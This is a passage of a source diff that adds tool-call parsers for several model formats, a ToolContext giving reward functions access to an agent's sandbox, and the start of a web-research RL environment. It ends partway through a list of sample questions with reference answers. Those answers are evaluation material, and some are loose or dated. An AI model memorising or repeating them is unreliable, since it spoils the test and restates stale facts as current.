r"<arg_key>(.*?)</arg_key>(?:\\n|\s)*<arg_value>(.*?)</arg_value>",
re.DOTALL,
)


@@ -0,0 +1,73 @@
"""
Hermes tool call parser.
Format: <tool_call>{"name": "func", "arguments": {...}}</tool_call>
Based on VLLM's Hermes2ProToolParser.extract_tool_calls()
"""
import json
import re
import uuid
from typing import List, Optional, Tuple
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
@register_parser("hermes")
class HermesToolCallParser(ToolCallParser):
"""
Parser for Hermes-format tool calls.
Matches <tool_call>...</tool_call> tags containing JSON with "name" and "arguments".
Also handles unclosed <tool_call> at end-of-string (truncated generation).
"""
# Matches both closed and unclosed tool_call tags
PATTERN = re.compile(
r"<tool_call>\s*(.*?)\s*</tool_call>|<tool_call>\s*(.*)", re.DOTALL
)
def parse(self, text: str) -> ParseResult:
if "<tool_call>" not in text:
return text, None
try:
matches = self.PATTERN.findall(text)
if not matches:
return text, None
tool_calls: List[ChatCompletionMessageToolCall] = []
for match in matches:
# match is a tuple: (closed_content, unclosed_content)
raw_json = match[0] if match[0] else match[1]
if not raw_json.strip():
continue
tc_data = json.loads(raw_json)
tool_calls.append(
ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:8]}",
type="function",
function=Function(
name=tc_data["name"],
arguments=json.dumps(
tc_data.get("arguments", {}), ensure_ascii=False
),
),
)
)
if not tool_calls:
return text, None
# Content is everything before the first <tool_call> tag
content = text[: text.find("<tool_call>")].strip()
return content if content else None, tool_calls
except Exception:
return text, None
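The second regex alternative exists for truncated generations; a small check (input invented for illustration):

raw = '<tool_call>{"name": "ls", "arguments": {}}'  # cut off before </tool_call>
content, calls = HermesToolCallParser().parse(raw)
assert content is None  # nothing precedes the tag
assert calls[0].function.name == "ls"
assert calls[0].function.arguments == "{}"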


@@ -0,0 +1,93 @@
"""
Kimi K2 tool call parser.
Format:
<|tool_calls_section_begin|>
<|tool_call_begin|>function_id:0<|tool_call_argument_begin|>{"arg": "val"}<|tool_call_end|>
<|tool_calls_section_end|>
The function_id format is typically "functions.func_name:index" or "func_name:index".
Based on VLLM's KimiK2ToolParser.extract_tool_calls()
"""
import re
import uuid
from typing import List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
@register_parser("kimi_k2")
class KimiK2ToolCallParser(ToolCallParser):
"""
Parser for Kimi K2 tool calls.
Uses section begin/end tokens wrapping individual tool call begin/end tokens.
The tool_call_id contains the function name (after last dot, before colon).
"""
# Support both singular and plural variants
START_TOKENS = [
"<|tool_calls_section_begin|>",
"<|tool_call_section_begin|>",
]
# Regex captures: tool_call_id (e.g., "functions.get_weather:0"), function_arguments
PATTERN = re.compile(
r"<\|tool_call_begin\|>\s*(?P<tool_call_id>[^<]+:\d+)\s*"
r"<\|tool_call_argument_begin\|>\s*"
r"(?P<function_arguments>(?:(?!<\|tool_call_begin\|>).)*?)\s*"
r"<\|tool_call_end\|>",
re.DOTALL,
)
def parse(self, text: str) -> ParseResult:
# Check for any variant of the start token
has_start = any(token in text for token in self.START_TOKENS)
if not has_start:
return text, None
try:
matches = self.PATTERN.findall(text)
if not matches:
return text, None
tool_calls: List[ChatCompletionMessageToolCall] = []
for match in matches:
function_id, function_args = match
# Extract function name from ID format: "functions.get_weather:0" -> "get_weather"
function_name = function_id.split(":")[0].split(".")[-1]
tool_calls.append(
ChatCompletionMessageToolCall(
id=function_id, # Preserve the original ID format
type="function",
function=Function(
name=function_name,
arguments=function_args.strip(),
),
)
)
if not tool_calls:
return text, None
# Content is everything before the tool calls section
earliest_start = len(text)
for token in self.START_TOKENS:
idx = text.find(token)
if idx >= 0 and idx < earliest_start:
earliest_start = idx
content = text[:earliest_start].strip()
return content if content else None, tool_calls
except Exception:
return text, None


@@ -0,0 +1,96 @@
"""
Llama 3.x / 4 tool call parser.
Format: The model outputs JSON objects with "name" and "arguments" (or "parameters") keys.
May be preceded by <|python_tag|> token. Supports multiple JSON objects separated
by content or semicolons.
Based on VLLM's Llama3JsonToolParser.extract_tool_calls()
"""
import json
import re
import uuid
from typing import List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
@register_parser("llama3_json")
@register_parser("llama4_json")
class LlamaToolCallParser(ToolCallParser):
"""
Parser for Llama 3.x and 4 JSON-format tool calls.
Finds JSON objects containing "name" + ("arguments" or "parameters") keys.
Uses Python's json.JSONDecoder.raw_decode for robust extraction of
JSON objects from mixed text.
"""
BOT_TOKEN = "<|python_tag|>"
# Regex to find the start of potential JSON objects
JSON_START = re.compile(r"\{")
def parse(self, text: str) -> ParseResult:
# Quick check: need either the bot token or a JSON brace
if self.BOT_TOKEN not in text and "{" not in text:
return text, None
try:
decoder = json.JSONDecoder()
tool_calls: List[ChatCompletionMessageToolCall] = []
end_index = -1 # Track where the last parsed JSON ended
for match in self.JSON_START.finditer(text):
start = match.start()
# Skip if this brace is inside a previously parsed JSON object
if start <= end_index:
continue
try:
obj, json_end = decoder.raw_decode(text[start:])
end_index = start + json_end
# Must have "name" and either "arguments" or "parameters"
name = obj.get("name")
args = obj.get("arguments", obj.get("parameters"))
if not name or args is None:
continue
# Normalize arguments to JSON string
if isinstance(args, dict):
args = json.dumps(args, ensure_ascii=False)
elif not isinstance(args, str):
args = json.dumps(args, ensure_ascii=False)
tool_calls.append(
ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:8]}",
type="function",
function=Function(name=name, arguments=args),
)
)
except (json.JSONDecodeError, KeyError, ValueError):
continue
if not tool_calls:
return text, None
# Content is everything before the first tool call JSON
# Find where the first tool call starts in the text
first_tc_start = text.find("{")
if self.BOT_TOKEN in text:
first_tc_start = text.find(self.BOT_TOKEN)
content = text[:first_tc_start].strip() if first_tc_start > 0 else None
return content, tool_calls
except Exception:
return text, None


@@ -0,0 +1,69 @@
"""
Longcat Flash Chat tool call parser.
Same as Hermes but uses <longcat_tool_call> tags instead of <tool_call>.
Based on VLLM's LongcatFlashToolParser (extends Hermes2ProToolParser).
"""
import json
import re
import uuid
from typing import List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
@register_parser("longcat")
class LongcatToolCallParser(ToolCallParser):
"""
Parser for Longcat Flash Chat tool calls.
Identical logic to Hermes, just different tag names.
"""
PATTERN = re.compile(
r"<longcat_tool_call>\s*(.*?)\s*</longcat_tool_call>|<longcat_tool_call>\s*(.*)",
re.DOTALL,
)
def parse(self, text: str) -> ParseResult:
if "<longcat_tool_call>" not in text:
return text, None
try:
matches = self.PATTERN.findall(text)
if not matches:
return text, None
tool_calls: List[ChatCompletionMessageToolCall] = []
for match in matches:
raw_json = match[0] if match[0] else match[1]
if not raw_json.strip():
continue
tc_data = json.loads(raw_json)
tool_calls.append(
ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:8]}",
type="function",
function=Function(
name=tc_data["name"],
arguments=json.dumps(
tc_data.get("arguments", {}), ensure_ascii=False
),
),
)
)
if not tool_calls:
return text, None
content = text[: text.find("<longcat_tool_call>")].strip()
return content if content else None, tool_calls
except Exception:
return text, None


@@ -0,0 +1,130 @@
"""
Mistral tool call parser.
Supports two formats depending on tokenizer version:
- Pre-v11: content[TOOL_CALLS] [{"name": ..., "arguments": {...}}, ...]
- v11+: content[TOOL_CALLS]tool_name1{"arg": "val"}[TOOL_CALLS]tool_name2{"arg": "val"}
Based on VLLM's MistralToolParser.extract_tool_calls()
The [TOOL_CALLS] token is the bot_token used by Mistral models.
"""
import json
import random
import re
import string
from typing import List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
def _generate_mistral_id() -> str:
"""Mistral tool call IDs are 9-char alphanumeric strings."""
return "".join(random.choices(string.ascii_letters + string.digits, k=9))
@register_parser("mistral")
class MistralToolCallParser(ToolCallParser):
"""
Parser for Mistral-format tool calls.
Detects format by checking if the content after [TOOL_CALLS] starts with '['
(pre-v11 JSON array) or with a tool name (v11+ format).
"""
# The [TOOL_CALLS] token -- may appear as different strings depending on tokenizer
BOT_TOKEN = "[TOOL_CALLS]"
# Fallback regex for pre-v11 format when JSON parsing fails
TOOL_CALL_REGEX = re.compile(r"\[?\s*(\{.*?\})\s*\]?", re.DOTALL)
def parse(self, text: str) -> ParseResult:
if self.BOT_TOKEN not in text:
return text, None
try:
parts = text.split(self.BOT_TOKEN)
content = parts[0].strip()
raw_tool_calls = parts[1:]
# Detect format: if the first raw part starts with '[', it's pre-v11
first_raw = raw_tool_calls[0].strip() if raw_tool_calls else ""
is_pre_v11 = first_raw.startswith("[") or first_raw.startswith("{")
tool_calls: List[ChatCompletionMessageToolCall] = []
if not is_pre_v11:
# v11+ format: [TOOL_CALLS]tool_name{args}[TOOL_CALLS]tool_name2{args2}
for raw in raw_tool_calls:
raw = raw.strip()
if not raw or "{" not in raw:
continue
brace_idx = raw.find("{")
tool_name = raw[:brace_idx].strip()
args_str = raw[brace_idx:]
tool_calls.append(
ChatCompletionMessageToolCall(
id=_generate_mistral_id(),
type="function",
function=Function(name=tool_name, arguments=args_str),
)
)
else:
# Pre-v11 format: [TOOL_CALLS] [{"name": ..., "arguments": {...}}]
try:
parsed = json.loads(first_raw)
if isinstance(parsed, dict):
parsed = [parsed]
for tc in parsed:
args = tc.get("arguments", {})
if isinstance(args, dict):
args = json.dumps(args, ensure_ascii=False)
tool_calls.append(
ChatCompletionMessageToolCall(
id=_generate_mistral_id(),
type="function",
function=Function(
name=tc["name"], arguments=args
),
)
)
except json.JSONDecodeError:
# Fallback regex extraction
match = self.TOOL_CALL_REGEX.findall(first_raw)
if match:
for raw_json in match:
try:
tc = json.loads(raw_json)
args = tc.get("arguments", {})
if isinstance(args, dict):
args = json.dumps(args, ensure_ascii=False)
tool_calls.append(
ChatCompletionMessageToolCall(
id=_generate_mistral_id(),
type="function",
function=Function(
name=tc["name"], arguments=args
),
)
)
except (json.JSONDecodeError, KeyError):
continue
if not tool_calls:
return text, None
return content if content else None, tool_calls
except Exception:
return text, None


@@ -0,0 +1,163 @@
"""
Qwen3-Coder tool call parser.
Format uses XML-style nested tags:
<tool_call>
<function=function_name>
<parameter=param_name>value</parameter>
<parameter=param_name2>value2</parameter>
</function>
</tool_call>
Parameters are extracted from <parameter=name>value</parameter> tags and
type-converted via a json.loads -> ast.literal_eval -> raw-string fallback
(no tool schema is consulted client-side).
Based on VLLM's Qwen3CoderToolParser.extract_tool_calls()
"""
import ast
import json
import re
import uuid
from typing import Any, Dict, List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
def _try_convert_value(value: str) -> Any:
"""
Try to convert a parameter value string to a native Python type.
Handles null, numbers, booleans, JSON objects/arrays, and falls back to string.
"""
stripped = value.strip()
# Handle null
if stripped.lower() == "null":
return None
# Try JSON first (handles objects, arrays, strings, numbers, booleans)
try:
return json.loads(stripped)
except (json.JSONDecodeError, TypeError):
pass
# Try Python literal eval (handles tuples, etc.)
try:
return ast.literal_eval(stripped)
except (ValueError, SyntaxError, TypeError):
pass
# Return as string
return stripped
@register_parser("qwen3_coder")
class Qwen3CoderToolCallParser(ToolCallParser):
"""
Parser for Qwen3-Coder XML-format tool calls.
Uses nested XML tags: <tool_call><function=name><parameter=key>val</parameter></function></tool_call>
"""
START_TOKEN = "<tool_call>"
FUNCTION_PREFIX = "<function="
# Find complete tool_call blocks (or unclosed at end)
TOOL_CALL_REGEX = re.compile(
r"<tool_call>(.*?)</tool_call>|<tool_call>(.*?)$", re.DOTALL
)
# Find function blocks within a tool_call
FUNCTION_REGEX = re.compile(
r"<function=(.*?)</function>|<function=(.*)$", re.DOTALL
)
# Find parameter blocks within a function
PARAMETER_REGEX = re.compile(
r"<parameter=(.*?)(?:</parameter>|(?=<parameter=)|(?=</function>)|$)",
re.DOTALL,
)
def _parse_function_call(self, function_str: str) -> Optional[ChatCompletionMessageToolCall]:
"""Parse a single <function=name>...</function> block into a ToolCall."""
try:
# Extract function name: everything before the first '>'
gt_idx = function_str.index(">")
func_name = function_str[:gt_idx].strip()
params_str = function_str[gt_idx + 1:]
# Extract parameters
param_dict: Dict[str, Any] = {}
for match_text in self.PARAMETER_REGEX.findall(params_str):
if ">" not in match_text:
continue
eq_idx = match_text.index(">")
param_name = match_text[:eq_idx].strip()
param_value = match_text[eq_idx + 1:]
# Clean up whitespace
if param_value.startswith("\n"):
param_value = param_value[1:]
if param_value.endswith("\n"):
param_value = param_value[:-1]
param_dict[param_name] = _try_convert_value(param_value)
return ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:24]}",
type="function",
function=Function(
name=func_name,
arguments=json.dumps(param_dict, ensure_ascii=False),
),
)
except (ValueError, IndexError):
return None
def parse(self, text: str) -> ParseResult:
if self.FUNCTION_PREFIX not in text:
return text, None
try:
# Find all tool_call blocks
tc_matches = self.TOOL_CALL_REGEX.findall(text)
raw_blocks = [m[0] if m[0] else m[1] for m in tc_matches]
# Fallback: if no tool_call tags, try the whole text
if not raw_blocks:
raw_blocks = [text]
# Find function blocks within each tool_call
function_strs: List[str] = []
for block in raw_blocks:
func_matches = self.FUNCTION_REGEX.findall(block)
function_strs.extend(m[0] if m[0] else m[1] for m in func_matches)
if not function_strs:
return text, None
# Parse each function call
tool_calls: List[ChatCompletionMessageToolCall] = []
for func_str in function_strs:
tc = self._parse_function_call(func_str)
if tc is not None:
tool_calls.append(tc)
if not tool_calls:
return text, None
# Content before tool calls
first_tc = text.find(self.START_TOKEN)
if first_tc < 0:
first_tc = text.find(self.FUNCTION_PREFIX)
content = text[:first_tc].strip() if first_tc > 0 else None
return content, tool_calls
except Exception:
return text, None
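
A self-contained sketch of the value-inference order implemented by _try_convert_value above (null first, then JSON, then Python literals, then the raw string). The helper below is a local copy for illustration, not an import of the module.

import ast
import json

def try_convert(value: str):
    # Same precedence as _try_convert_value above.
    s = value.strip()
    if s.lower() == "null":
        return None
    try:
        return json.loads(s)        # numbers, booleans, objects, arrays
    except (json.JSONDecodeError, TypeError):
        pass
    try:
        return ast.literal_eval(s)  # tuples and other Python literals
    except (ValueError, SyntaxError, TypeError):
        pass
    return s                        # fall back to the raw string

assert try_convert("100") == 100
assert try_convert("true") is True
assert try_convert("null") is None
assert try_convert('{"k": [1, 2]}') == {"k": [1, 2]}
assert try_convert("(1, 2)") == (1, 2)
assert try_convert("plain text") == "plain text"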

View File

@@ -0,0 +1,19 @@
"""
Qwen 2.5 tool call parser.
Uses the same <tool_call> format as Hermes.
Registered as a separate parser name for clarity when using --tool-parser=qwen.
"""
from environments.tool_call_parsers import register_parser
from environments.tool_call_parsers.hermes_parser import HermesToolCallParser
@register_parser("qwen")
class QwenToolCallParser(HermesToolCallParser):
"""
Parser for Qwen 2.5 tool calls.
Same <tool_call>{"name": ..., "arguments": ...}</tool_call> format as Hermes.
"""
pass # Identical format -- inherits everything from Hermes

View File

@@ -0,0 +1,474 @@
"""
ToolContext -- Unrestricted Tool Access for Reward Functions
A per-rollout handle that gives reward/verification functions direct access to
ALL hermes-agent tools, scoped to the rollout's task_id. The same task_id means
the terminal/browser session is the SAME one the model used during its rollout --
all state (files, processes, browser tabs) is preserved.
The verifier author decides which tools to use. Nothing is hardcoded or gated.
Example usage in a compute_reward():
async def compute_reward(self, item, result, ctx):
# Run tests in the model's terminal sandbox
test = ctx.terminal("pytest -v")
if test["exit_code"] == 0:
return 1.0
# Check if a file was created
content = ctx.read_file("/workspace/solution.py")
if content.get("content"):
return 0.5
return 0.0
"""
import json
import logging
import os
from typing import Any, Dict, List, Optional
import asyncio
import concurrent.futures
from model_tools import handle_function_call
from tools.terminal_tool import cleanup_vm
from tools.browser_tool import cleanup_browser
logger = logging.getLogger(__name__)
# Thread pool for running sync tool calls that internally use asyncio.run()
_tool_executor = concurrent.futures.ThreadPoolExecutor(max_workers=4)
def _run_tool_in_thread(tool_name: str, arguments: Dict[str, Any], task_id: str) -> str:
"""
Run a tool call in a thread pool executor so backends that use asyncio.run()
internally (modal, docker, daytona) get a clean event loop.
If we're already in an async context, executes handle_function_call() in a
disposable worker thread and blocks for the result.
If not (e.g., called from sync code), runs directly.
"""
try:
asyncio.get_running_loop()  # raises RuntimeError if no loop is running
# We're in an async context -- run the blocking call in a disposable thread
with concurrent.futures.ThreadPoolExecutor(max_workers=1) as pool:
future = pool.submit(
handle_function_call, tool_name, arguments, task_id
)
return future.result(timeout=300)
except RuntimeError:
# No running event loop -- safe to call directly
return handle_function_call(tool_name, arguments, task_id)
class ToolContext:
"""
Open-ended access to all hermes-agent tools for a specific rollout.
Passed to compute_reward() so verifiers can use any tool they need:
terminal commands, file reads/writes, web searches, browser automation, etc.
All calls share the rollout's task_id for session isolation.
"""
def __init__(self, task_id: str):
self.task_id = task_id
# -------------------------------------------------------------------------
# Terminal tools
# -------------------------------------------------------------------------
def terminal(self, command: str, timeout: int = 180) -> Dict[str, Any]:
"""
Run a command in the rollout's terminal session.
Args:
command: Shell command to execute
timeout: Command timeout in seconds
Returns:
Dict with 'exit_code' (int) and 'output' (str)
"""
backend = os.getenv("TERMINAL_ENV", "local")
logger.debug("ToolContext.terminal [%s backend] task=%s: %s", backend, self.task_id[:8], command[:100])
# Run via thread helper so modal/docker/daytona backends' asyncio.run() doesn't deadlock
result = _run_tool_in_thread(
"terminal",
{"command": command, "timeout": timeout},
self.task_id,
)
try:
return json.loads(result)
except json.JSONDecodeError:
return {"exit_code": -1, "output": result}
# -------------------------------------------------------------------------
# File tools
# -------------------------------------------------------------------------
def read_file(self, path: str) -> Dict[str, Any]:
"""
Read a file from the rollout's filesystem.
Args:
path: File path to read
Returns:
Dict with file content or error
"""
result = handle_function_call(
"read_file", {"path": path}, task_id=self.task_id
)
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
def write_file(self, path: str, content: str) -> Dict[str, Any]:
"""
Write a TEXT file in the rollout's filesystem.
Uses a shell heredoc under the hood, so this is only safe for text content.
For binary files (images, compiled artifacts, etc.), use upload_file() instead.
Args:
path: File path to write
content: Text content to write
Returns:
Dict with success status or error
"""
result = handle_function_call(
"write_file", {"path": path, "content": content}, task_id=self.task_id
)
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
def upload_file(self, local_path: str, remote_path: str) -> Dict[str, Any]:
"""
Upload a local file to the rollout's sandbox (binary-safe).
Unlike write_file() which passes content through a shell heredoc (text-only),
this method base64-encodes the file and decodes it inside the sandbox.
Safe for any file type: binaries, images, archives, etc.
For large files (>1MB), the content is split into chunks to avoid
hitting shell command-length limits.
Args:
local_path: Path to a local file on the host
remote_path: Destination path inside the sandbox
Returns:
Dict with 'exit_code' and 'output'
"""
import base64
from pathlib import Path as _Path
local = _Path(local_path)
if not local.exists():
return {"exit_code": -1, "output": f"Local file not found: {local_path}"}
raw = local.read_bytes()
b64 = base64.b64encode(raw).decode("ascii")
# Ensure parent directory exists in the sandbox
parent = str(_Path(remote_path).parent)
if parent not in (".", "/"):
self.terminal(f"mkdir -p {parent}", timeout=10)
# For small files, single command is fine
chunk_size = 60_000 # ~60KB per chunk (well within shell limits)
if len(b64) <= chunk_size:
result = self.terminal(
f"printf '%s' '{b64}' | base64 -d > {remote_path}",
timeout=30,
)
else:
# For larger files, write base64 in chunks then decode
tmp_b64 = "/tmp/_hermes_upload.b64"
self.terminal(f": > {tmp_b64}", timeout=5) # truncate
for i in range(0, len(b64), chunk_size):
chunk = b64[i : i + chunk_size]
self.terminal(f"printf '%s' '{chunk}' >> {tmp_b64}", timeout=15)
result = self.terminal(
f"base64 -d {tmp_b64} > {remote_path} && rm -f {tmp_b64}",
timeout=30,
)
return result
def upload_dir(self, local_dir: str, remote_dir: str) -> List[Dict[str, Any]]:
"""
Upload an entire local directory to the rollout's sandbox (binary-safe).
Recursively uploads all files, preserving directory structure.
Args:
local_dir: Path to a local directory on the host
remote_dir: Destination directory inside the sandbox
Returns:
List of results, one per file uploaded
"""
from pathlib import Path as _Path
local = _Path(local_dir)
if not local.exists() or not local.is_dir():
return [{"exit_code": -1, "output": f"Local directory not found: {local_dir}"}]
results = []
for file_path in sorted(local.rglob("*")):
if file_path.is_file():
relative = file_path.relative_to(local)
target = f"{remote_dir}/{relative}"
results.append(self.upload_file(str(file_path), target))
return results
def download_file(self, remote_path: str, local_path: str) -> Dict[str, Any]:
"""
Download a file from the rollout's sandbox to the host (binary-safe).
The inverse of upload_file(). Base64-encodes the file inside the sandbox,
reads the encoded data through the terminal, and decodes it locally.
Safe for any file type.
Args:
remote_path: Path to the file inside the sandbox
local_path: Destination path on the host
Returns:
Dict with 'success' (bool) and 'bytes' (int) or 'error' (str)
"""
import base64
from pathlib import Path as _Path
# Base64-encode the file inside the sandbox and capture output
result = self.terminal(
f"base64 {remote_path} 2>/dev/null",
timeout=30,
)
if result.get("exit_code", -1) != 0:
return {
"success": False,
"error": f"Failed to read remote file: {result.get('output', '')}",
}
b64_data = result.get("output", "").strip()
if not b64_data:
return {"success": False, "error": f"Remote file is empty or missing: {remote_path}"}
try:
raw = base64.b64decode(b64_data)
except Exception as e:
return {"success": False, "error": f"Base64 decode failed: {e}"}
# Write to local host filesystem
local = _Path(local_path)
local.parent.mkdir(parents=True, exist_ok=True)
local.write_bytes(raw)
return {"success": True, "bytes": len(raw)}
def download_dir(self, remote_dir: str, local_dir: str) -> List[Dict[str, Any]]:
"""
Download a directory from the rollout's sandbox to the host (binary-safe).
Lists all files in the remote directory, then downloads each one.
Preserves directory structure.
Args:
remote_dir: Path to the directory inside the sandbox
local_dir: Destination directory on the host
Returns:
List of results, one per file downloaded
"""
from pathlib import Path as _Path
# List files in the remote directory
ls_result = self.terminal(
f"find {remote_dir} -type f 2>/dev/null",
timeout=15,
)
if ls_result.get("exit_code", -1) != 0:
return [{"success": False, "error": f"Failed to list remote dir: {remote_dir}"}]
file_list = ls_result.get("output", "").strip()
if not file_list:
return [{"success": False, "error": f"Remote directory is empty or missing: {remote_dir}"}]
results = []
for remote_file in file_list.splitlines():
remote_file = remote_file.strip()
if not remote_file:
continue
# Compute the relative path to preserve directory structure
if remote_file.startswith(remote_dir):
relative = remote_file[len(remote_dir):].lstrip("/")
else:
relative = _Path(remote_file).name
local_file = str(_Path(local_dir) / relative)
results.append(self.download_file(remote_file, local_file))
return results
def search(self, query: str, path: str = ".") -> Dict[str, Any]:
"""
Search for text in the rollout's filesystem.
Args:
query: Search query
path: Directory to search in
Returns:
Dict with search results
"""
result = handle_function_call(
"search_files", {"pattern": query, "path": path}, task_id=self.task_id
)
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
# -------------------------------------------------------------------------
# Web tools
# -------------------------------------------------------------------------
def web_search(self, query: str) -> Dict[str, Any]:
"""
Search the web.
Args:
query: Search query
Returns:
Dict with search results
"""
result = handle_function_call("web_search", {"query": query})
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
def web_extract(self, urls: List[str]) -> Dict[str, Any]:
"""
Extract content from URLs.
Args:
urls: List of URLs to extract content from
Returns:
Dict with extracted content
"""
result = handle_function_call("web_extract", {"urls": urls})
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
# -------------------------------------------------------------------------
# Browser tools
# -------------------------------------------------------------------------
def browser_navigate(self, url: str) -> Dict[str, Any]:
"""
Navigate the rollout's browser session to a URL.
Args:
url: URL to navigate to
Returns:
Dict with page snapshot or error
"""
result = handle_function_call(
"browser_navigate", {"url": url}, task_id=self.task_id
)
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
def browser_snapshot(self) -> Dict[str, Any]:
"""
Take a snapshot of the current browser page.
Returns:
Dict with page content/accessibility snapshot
"""
result = handle_function_call(
"browser_snapshot", {}, task_id=self.task_id
)
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
# -------------------------------------------------------------------------
# Generic tool access
# -------------------------------------------------------------------------
def call_tool(self, tool_name: str, arguments: Dict[str, Any]) -> str:
"""
Call any hermes-agent tool by name.
This is the generic escape hatch -- if a tool doesn't have a convenience
wrapper above, you can call it directly here.
Args:
tool_name: Name of the tool (e.g., "vision_analyze", "skills_list")
arguments: Dict of arguments for the tool
Returns:
Raw JSON string result from the tool
"""
return _run_tool_in_thread(tool_name, arguments, self.task_id)
# -------------------------------------------------------------------------
# Cleanup
# -------------------------------------------------------------------------
def cleanup(self):
"""
Release all resources (terminal VMs, browser sessions, background processes)
for this rollout.
Called automatically by the base environment via try/finally after
compute_reward() completes. You generally don't need to call this yourself.
"""
# Kill any background processes from this rollout (safety net)
try:
from tools.process_registry import process_registry
killed = process_registry.kill_all(task_id=self.task_id)
if killed:
logger.debug("Process cleanup for task %s: killed %d process(es)", self.task_id, killed)
except Exception as e:
logger.debug("Process cleanup for task %s: %s", self.task_id, e)
try:
cleanup_vm(self.task_id)
except Exception as e:
logger.debug("VM cleanup for task %s: %s", self.task_id, e)
# Suppress browser_tool's noisy debug prints during cleanup.
# The cleanup still runs; it just doesn't spam the console.
_prev_quiet = os.environ.get("HERMES_QUIET")
os.environ["HERMES_QUIET"] = "1"
try:
cleanup_browser(self.task_id)
except Exception as e:
logger.debug("Browser cleanup for task %s: %s", self.task_id, e)
finally:
if _prev_quiet is None:
os.environ.pop("HERMES_QUIET", None)
else:
os.environ["HERMES_QUIET"] = _prev_quiet

View File

@@ -0,0 +1,718 @@
"""
WebResearchEnv — RL Environment for Multi-Step Web Research
============================================================
Trains models to do accurate, efficient, multi-source web research.
Reward signals:
- Answer correctness (LLM judge, 0.0-1.0)
- Source diversity (used ≥2 distinct domains)
- Efficiency (penalizes excessive tool calls)
- Tool usage (bonus for actually using web tools)
Dataset: FRAMES benchmark (Google, 2024) — multi-hop factual questions
HuggingFace: google/frames-benchmark
Fallback: built-in sample questions (no HF token needed)
Usage:
# Phase 1 (OpenAI-compatible server)
python environments/web_research_env.py serve \\
--openai.base_url http://localhost:8000/v1 \\
--openai.model_name YourModel \\
--openai.server_type openai
# Process mode (offline data generation)
python environments/web_research_env.py process \\
--env.data_path_to_save_groups data/web_research.jsonl
# Standalone eval
python environments/web_research_env.py evaluate \\
--openai.base_url http://localhost:8000/v1 \\
--openai.model_name YourModel
Built by: github.com/jackx707
Inspired by: GroceryMind — production Hermes agent doing live web research
across German grocery stores (firecrawl + hermes-agent)
"""
from __future__ import annotations
import asyncio
import json
import logging
import os
import random
import re
import sys
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
from urllib.parse import urlparse
from pydantic import Field
# Ensure hermes-agent root is on path
_repo_root = Path(__file__).resolve().parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
# ---------------------------------------------------------------------------
# Optional HuggingFace datasets import
# ---------------------------------------------------------------------------
try:
from datasets import load_dataset
HF_AVAILABLE = True
except ImportError:
HF_AVAILABLE = False
from atroposlib.envs.base import ScoredDataGroup
from atroposlib.envs.server_handling.server_manager import APIServerConfig
from atroposlib.type_definitions import Item
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
from environments.agent_loop import AgentResult
from environments.tool_context import ToolContext
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Fallback sample dataset (used when HuggingFace is unavailable)
# Multi-hop questions requiring real web search to answer.
# ---------------------------------------------------------------------------
SAMPLE_QUESTIONS = [
{
"question": "What is the current population of the capital city of the country that won the 2022 FIFA World Cup?",
"answer": "Buenos Aires has approximately 3 million people in the city proper, or around 15 million in the greater metro area.",
"difficulty": "medium",
"hops": 2,
},
{
"question": "Who is the CEO of the company that makes the most widely used open-source container orchestration platform?",
"answer": "The Linux Foundation oversees Kubernetes. CNCF (Cloud Native Computing Foundation) is the specific body — it does not have a traditional CEO but has an executive director.",
"difficulty": "medium",
"hops": 2,
},
{
"question": "What programming language was used to write the original version of the web framework used by Instagram?",
"answer": "Django, which Instagram was built on, is written in Python.",
"difficulty": "easy",
"hops": 2,
},
{
"question": "In what year was the university founded where the inventor of the World Wide Web currently holds a professorship?",
"answer": "Tim Berners-Lee holds a professorship at MIT (founded 1861) and the University of Southampton (founded 1952).",
"difficulty": "hard",
"hops": 3,
},
{
"question": "What is the latest stable version of the programming language that ranks #1 on the TIOBE index as of this year?",
"answer": "Python is currently #1 on TIOBE. The latest stable version should be verified via the official python.org site.",
"difficulty": "medium",
"hops": 2,
},
{
"question": "How many employees does the parent company of Instagram have?",
"answer": "Meta Platforms (parent of Instagram) employs approximately 70,000+ people as of recent reports.",
"difficulty": "medium",
"hops": 2,
},
{
"question": "What is the current interest rate set by the central bank of the country where the Eiffel Tower is located?",
"answer": "The European Central Bank sets rates for France/eurozone. The current rate should be verified — it has changed frequently in 2023-2025.",
"difficulty": "hard",
"hops": 2,
},
{
"question": "Which company acquired the startup founded by the creator of Oculus VR?",
"answer": "Palmer Luckey founded Oculus VR, which was acquired by Facebook (now Meta). He later founded Anduril Industries.",
"difficulty": "medium",
"hops": 2,
},
{
"question": "What is the market cap of the company that owns the most popular search engine in Russia?",
"answer": "Yandex (now split into separate entities after 2024 restructuring). Current market cap should be verified via financial sources.",
"difficulty": "hard",
"hops": 2,
},
{
"question": "What was the GDP growth rate of the country that hosted the most recent Summer Olympics?",
"answer": "Paris, France hosted the 2024 Summer Olympics. France's recent GDP growth should be verified via World Bank or IMF data.",
